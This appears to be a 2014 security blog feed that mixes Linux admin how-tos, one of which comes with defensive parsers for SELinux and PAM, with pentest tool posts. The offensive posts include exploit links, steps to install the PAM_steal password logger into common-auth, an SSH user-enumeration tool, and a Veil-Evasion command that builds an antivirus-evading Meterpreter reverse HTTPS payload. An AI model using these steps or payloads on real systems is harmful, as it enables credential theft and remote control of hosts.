CVE Feeds

Jul 23, 2014

Some privilege escalation exploits in Linux and Windows XP on 22/07/2014

Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation

http://www.exploit-db.com/exploits/34112/

Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation

http://www.exploit-db.com/exploits/34131/

Linux Kernel ptrace/sysret - Local Privilege Escalation

http://www.exploit-db.com/exploits/34134/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Ruby Programming Tutorial

Youtube Link Channel: https://www.youtube.com/playlist?list=PLMK2xMz5H5Zv8eC8b4K6tMaE1-Z9FgSOp



Jul 22, 2014

Article: A rough test of prying into Baidu

I did this article just for fun and did not use it for long, so it may not be complete.

https://db.tt/FmFb5KdT



Jul 21, 2014

BSides Cleveland 2014 Videos

http://www.irongeek.com/i.php?page=videos/bsidescleveland2014/mainlist


Howto: Create rules for SELinux Allow

From the logs (audit log or messages log):

type=AVC msg=audit(1218128130.653:334): avc:  denied  { connectto } for  pid=9111 comm="smtpd" path="/var/spool/postfix/postgrey/socket"
scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:system_r:initrc_t:s0 tclass=unix_stream_socket
type=AVC msg=audit(1218128130.653:334): avc:  denied  { write } for  pid=9111 comm="smtpd" name="socket" dev=sda6 ino=39977017
scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:object_r:postfix_spool_t:s0 tclass=sock_file  
 
Create the rules with:
# grep smtpd_t /var/log/audit/audit.log | audit2allow -M postgreylocal

We then load our postgrey policy module using the 'semodule' command into the current SELinux policy:
# semodule -i postgreylocal.pp 

Source: http://wiki.centos.org/HowTos/SELinux
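As an added example (not from the post or the CentOS wiki), here is a small Python parser that pulls the source type, target type, object class and permissions out of AVC denial records like the ones above, renders the same allow rules audit2allow would generate so they can be reviewed before loading the module, and flags rules whose target is a broad domain such as initrc_t. The sample log text is constructed from the two denial lines quoted above.

```python
import re
from collections import defaultdict

# Constructed sample: the two AVC denials quoted above, each rejoined onto one line as
# auditd writes them, plus an unrelated SYSCALL record that the parser must skip.
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1218128130.653:334): avc:  denied  { connectto } for  pid=9111 comm="smtpd" path="/var/spool/postfix/postgrey/socket" scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:system_r:initrc_t:s0 tclass=unix_stream_socket
type=AVC msg=audit(1218128130.653:334): avc:  denied  { write } for  pid=9111 comm="smtpd" name="socket" dev=sda6 ino=39977017 scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:object_r:postfix_spool_t:s0 tclass=sock_file
type=SYSCALL msg=audit(1218128130.653:334): arch=c000003e syscall=42 success=no exit=-13 comm="smtpd"
"""

AVC_RE = re.compile(
    r'type=AVC .*?avc:\s+denied\s+\{ (?P<perms>[^}]+)\} for .*?'
    r'scontext=(?P<scontext>\S+) tcontext=(?P<tcontext>\S+) tclass=(?P<tclass>\S+)'
)

# Target domains worth a second look before allowing: the target runs unconfined or
# in the generic init domain, so labelling the target service is usually the real fix.
BROAD_TARGET_TYPES = {"initrc_t", "unconfined_t"}


def context_type(context):
    """user:role:type:level -> type, the field SELinux rules are written against."""
    return context.split(":")[2]


def parse_avc_denials(log_text):
    """Map (source_type, target_type, tclass) -> set of denied permissions."""
    denials = defaultdict(set)
    for line in log_text.splitlines():
        m = AVC_RE.search(line)
        if m is None:
            continue  # SYSCALL, PATH, ... records carry no AVC decision
        key = (context_type(m["scontext"]), context_type(m["tcontext"]), m["tclass"])
        denials[key].update(m["perms"].split())
    return dict(denials)


def allow_rules(denials):
    """Render denials as TE allow rules in audit2allow's style, sorted for review."""
    rules = []
    for (src, tgt, tclass), perms in sorted(denials.items()):
        perms = sorted(perms)
        perm_str = perms[0] if len(perms) == 1 else "{ " + " ".join(perms) + " }"
        rules.append(f"allow {src} {tgt}:{tclass} {perm_str};")
    return rules


def review_flags(denials):
    """Name the rules whose target domain is too broad to allow without review."""
    return [f"{src} -> {tgt}:{tclass}" for (src, tgt, tclass) in sorted(denials)
            if tgt in BROAD_TARGET_TYPES]
```

Run it over a real audit.log before calling audit2allow; if a rule points at initrc_t, the cleaner fix is usually to give that service (here postgrey) its own domain rather than allowing smtpd to talk to the init domain.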



Jul 20, 2014

Howto: Setup logstalgia - website access log visualization

1. Install dependencies
apt-get install glew-utils libglew-dev libsdl1.2-dev libsdl-image1.2-dev


2. Compile and install the package
$ ./configure && make && make install

3. Use it with
$ logstalgia path-of-access.log file
$ logstalgia /var/log/apache2/access.log

Live monitoring
$ tail -f /var/log/apache2/access.log | logstalgia -


Jul 19, 2014

Tools: PAM_steal - Monitoring password PAM

Typically, a pentest attack can be presented by the following schema:

perimeter -> command execution -> privileges escalation -> ...
The next step for pentesters is to gain privileges on other machines.
For example, it can be done by stealing credentials (one of many methods).
Passwords on the local machine are stored hashed, and cracking them is not a good option because of the time it takes.

SSH MITM (tool: http://www.signedness.org/tools/mitm-ssh.tgz) is a good one. It should be noted, though, that passwords can be shared between many services, so another way of capturing them is also necessary.

PAM (Pluggable Authentication Modules) provides dynamic authorization for applications and services in a Linux system. Our password logger plugin for PAM can be found here: https://github.com/ONsec-Lab/scripts/tree/master/pam_steal

This is a good point after rooting machines during penetration tests.

Install process:
./make.sh
vim /etc/pam.d/common-auth
Add "auth required pam_steal.so" to it.
Then check /tmp/.steal.log - all FTP/SSH and other PAM-based daemons' passwords will be there!

Source: http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html
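From the defender's side, as an added example that is not from the post or the pam_steal project: a small Python check that parses a PAM stack file such as /etc/pam.d/common-auth and reports any module that is not in a known-good baseline, which is exactly how the extra line from the install step above would show up. The sample file content and the baseline module set are constructed assumptions; adjust the baseline to the host's real configuration.

```python
import os
import re

# Constructed sample of /etc/pam.d/common-auth as it would look after the step above,
# with the extra "auth required pam_steal.so" line appended to a stock Ubuntu stack.
SAMPLE_COMMON_AUTH = """\
# /etc/pam.d/common-auth - authentication settings common to all services
auth    [success=1 default=ignore]      pam_unix.so nullok_secure
# here's the fallback if no module succeeds
auth    requisite                       pam_deny.so
auth    required                        pam_permit.so
auth    optional                        pam_cap.so
auth required pam_steal.so
"""

# Assumed baseline: the modules a stock Ubuntu 14.04 common-auth references.
# Tailor this to the host's known-good configuration before relying on it.
EXPECTED_MODULES = {"pam_unix.so", "pam_deny.so", "pam_permit.so", "pam_cap.so"}

# Entry layout is: type  control  module [args]. The control field may be a bracketed
# [value=action ...] list and the type may carry a leading "-" (silence missing-module errors).
ENTRY_RE = re.compile(
    r"^-?(?P<type>auth|account|password|session)\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+(?P<module>\S+)(?P<args>.*)$"
)


def parse_pam_stack(text):
    """Return (type, control, module, args) for each active entry, skipping comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if m:  # @include and other directives do not match and are ignored here
            entries.append((m["type"], m["control"], m["module"], m["args"].split()))
    return entries


def find_unexpected_modules(text, expected=EXPECTED_MODULES):
    """List (module, control) pairs not in the baseline. A required/requisite entry in
    the auth stack is handed every password, so any unknown module here needs attention."""
    return [(mod, ctrl) for (_typ, ctrl, mod, _args) in parse_pam_stack(text)
            if os.path.basename(mod) not in expected]
```

Pair the check with file-integrity monitoring of /etc/pam.d and the PAM module directory, since the stack file and the new .so are the two artifacts this kind of plugin leaves behind.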



Tools: OSUETA - A simple Python script to exploit the OpenSSH User Enumeration Timing Attack

OSUETA stands for OpenSSH User Enumeration Timing Attack and is a small script written in Python to exploit a bug present in versions 5.* and 6.* of OpenSSH. In these versions, during the authentication process, you may obtain a list of users on the system by measuring the time it takes the server to evaluate an arbitrarily long password.

If the user is present, the time it takes the server to respond is larger. By confirming which users are present on a system, this tool can be useful in penetration testing to shorten brute-force attempts. The script also has the ability to perform a denial-of-service attack against the SSH service.

Source: https://github.com/c0r3dump3d/osueta



Jul 17, 2014

Howto: Password Protection for Grub Bootloader in Ubuntu 14.04

1. Generate a password hash with the grub-mkpasswd-pbkdf2 command.
2. Edit /etc/grub.d/00_header. Add these lines to the bottom of the file:
#### Protect the grub boot loader
cat << EOF
set superusers="youruser"
password_pbkdf2 youruser  <your_password_that_got_from_step#1>

EOF

3. Edit /etc/grub.d/10_linux, at line 117. Add "--users youruser" between "with Linux" and "os", such as:
title="$(gettext_printf "%s, with Linux %s (%s)" --users adminlocal "${os}" "${version}" "$(gettext "${GRUB_RECOVERY_TITLE}")")" ;;

4. Regenerate the configuration with grub-mkconfig:
# grub-mkconfig -o /boot/grub/grub.cfg

5. Done.

** If you do not want to be asked for a password on the normal boot entry, add "--unrestricted" to that boot entry, such as:
menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-d7a144cb-230e-4134-888e-a6e5840e26d0' --unrestricted
 


Jul 14, 2014

Howto: Bypassing AV with Veil-Evasion

Full article:: https://www.netspi.com/blog/entryid/234/bypassing-av-with-veil-evasion

There are a couple of built-in encoders in Metasploit (shikata ga nai is the most popular one), but their signatures have been added to many antivirus solutions, resulting in detection.
Veil-Evasion comes with thirty different payloads in C, C#, PowerShell, and Python.
The Python versions stand out, simply because Python was (until recently) the only language in Veil-Evasion that supported Meterpreter reverse HTTPS connections. This is beneficial for shells because everything is encrypted with SSL, preventing the commands and results from being transmitted in the clear and potentially being discovered by an IDS or IPS. Another benefit of using Python is the ability to make contained payloads: all the Meterpreter code needed for the reverse HTTPS connection is already included, instead of only a stager that downloads the rest of the code to run.
Veil-Evasion also has command-line switches that allow for easy scripting, which makes it simple to generate dynamic Veil-encoded Meterpreter payloads. Below is an example of a Python reverse_https_contained Meterpreter executable using pyherion encoding being generated from the command line:

/root/tools/Github/Veil/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_https_contained -c LHOST=127.0.0.1 LPORT=443 use_pyherion=Y --overwrite -o malicious